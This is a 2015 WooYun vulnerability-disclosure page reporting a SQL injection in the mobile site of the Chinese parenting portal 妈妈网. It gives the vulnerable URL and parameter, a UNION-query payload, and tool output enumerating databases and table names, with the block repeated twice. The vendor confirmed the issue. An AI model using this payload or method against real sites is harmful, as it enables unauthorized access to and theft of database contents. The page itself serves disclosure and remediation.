当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121392

漏洞标题:妈妈网某站存在SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 风若新

提交时间:2015-06-18 15:45

修复时间:2015-08-02 16:44

公开时间:2015-08-02 16:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向核心白帽子及相关领域专家公开
2015-07-08: 细节向普通白帽子公开
2015-07-18: 细节向实习白帽子公开
2015-08-02: 细节向公众公开

简要描述:

妈妈网某站存在SQL注入漏洞,大量数据泄露吧

详细说明:

妈妈网移动端网站存在sql注入漏洞,可以脱裤

m.mama.cn


注入地址

m.mama.cn/index.php?a=SafeFood&d=search&g=Wap


---
Place: POST
Parameter: search_name
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: search_name=1') LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a656d6c3a,0x536e757562446374595a,0x3a6c6a613a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[15:36:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5
[15:36:58] [INFO] fetching database names
available databases [4]:
[*] cms
[*] information_schema
[*] mamacn
[*] test


Database: cms
[67 tables]
+---------------------------------+
| checksums |
| cj_column |
| cms_admin_login_log |
| cms_admin_menu |
| cms_admin_user |
| cms_art_pics |
| cms_article |
| cms_article_ |
| cms_article_luyin |
| cms_babyyuer |
| cms_block_type |
| cms_browser_cache |
| cms_channel |
| cms_channel_article |
| cms_channel_article_ |
| cms_channel_collectart |
| cms_channel_collectart_test |
| cms_channel_page |
| cms_channel_thread |
| cms_classtype |
| cms_collectart |
| cms_copy_set |
| cms_crontab_sthml |
| cms_datablock |
| cms_datablock_item |
| cms_edit_block |
| cms_edit_history |
| cms_file_rsync |
| cms_keywords |
| cms_log |
| cms_log_desc |
| cms_log_type |
| cms_pic_download |
| cms_refresh |
| cms_search_log |
| cms_special |
| cms_tag |
| cms_tag_article |
| cms_templates |
| cms_thread |
| cms_upload_pic |
| cn_resource |
| qrqm_adv |
| qrqm_adv_age |
| qrqm_adv_item |
| qrqm_age |
| qrqm_askad |
| qrqm_baby_reference |
| qrqm_body_examine |
| qrqm_focus |
| qrqm_safe_food |
| qrqm_send_item |
| qrqm_statistical_age |
| qrqm_statistical_age_clicks |
| qrqm_statistical_age_detail |
| qrqm_statistical_article |
| qrqm_statistical_article_detail |
| qrqm_statistical_author_detail |
| qrqm_statistical_author_month |
| qrqm_statistical_clicks |
| qrqm_statistical_source |
| qrqm_trade_block |
| qrqm_trade_block_age |
| qrqm_trade_item |
| sph_counter |
| yahoo_esb |
| yoka_news |
+---------------------------------+


好吧,就这些了,未在深入

漏洞证明:

妈妈网移动端网站存在sql注入漏洞,可以脱裤

m.mama.cn


注入地址

m.mama.cn/index.php?a=SafeFood&d=search&g=Wap


---
Place: POST
Parameter: search_name
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: search_name=1') LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a656d6c3a,0x536e757562446374595a,0x3a6c6a613a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[15:36:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5
[15:36:58] [INFO] fetching database names
available databases [4]:
[*] cms
[*] information_schema
[*] mamacn
[*] test


Database: cms
[67 tables]
+---------------------------------+
| checksums |
| cj_column |
| cms_admin_login_log |
| cms_admin_menu |
| cms_admin_user |
| cms_art_pics |
| cms_article |
| cms_article_ |
| cms_article_luyin |
| cms_babyyuer |
| cms_block_type |
| cms_browser_cache |
| cms_channel |
| cms_channel_article |
| cms_channel_article_ |
| cms_channel_collectart |
| cms_channel_collectart_test |
| cms_channel_page |
| cms_channel_thread |
| cms_classtype |
| cms_collectart |
| cms_copy_set |
| cms_crontab_sthml |
| cms_datablock |
| cms_datablock_item |
| cms_edit_block |
| cms_edit_history |
| cms_file_rsync |
| cms_keywords |
| cms_log |
| cms_log_desc |
| cms_log_type |
| cms_pic_download |
| cms_refresh |
| cms_search_log |
| cms_special |
| cms_tag |
| cms_tag_article |
| cms_templates |
| cms_thread |
| cms_upload_pic |
| cn_resource |
| qrqm_adv |
| qrqm_adv_age |
| qrqm_adv_item |
| qrqm_age |
| qrqm_askad |
| qrqm_baby_reference |
| qrqm_body_examine |
| qrqm_focus |
| qrqm_safe_food |
| qrqm_send_item |
| qrqm_statistical_age |
| qrqm_statistical_age_clicks |
| qrqm_statistical_age_detail |
| qrqm_statistical_article |
| qrqm_statistical_article_detail |
| qrqm_statistical_author_detail |
| qrqm_statistical_author_month |
| qrqm_statistical_clicks |
| qrqm_statistical_source |
| qrqm_trade_block |
| qrqm_trade_block_age |
| qrqm_trade_item |
| sph_counter |
| yahoo_esb |
| yoka_news |
+---------------------------------+


好吧,就这些了,未在深入

修复方案:

过滤,修复

版权声明:转载请注明来源 风若新@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-18 16:42

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论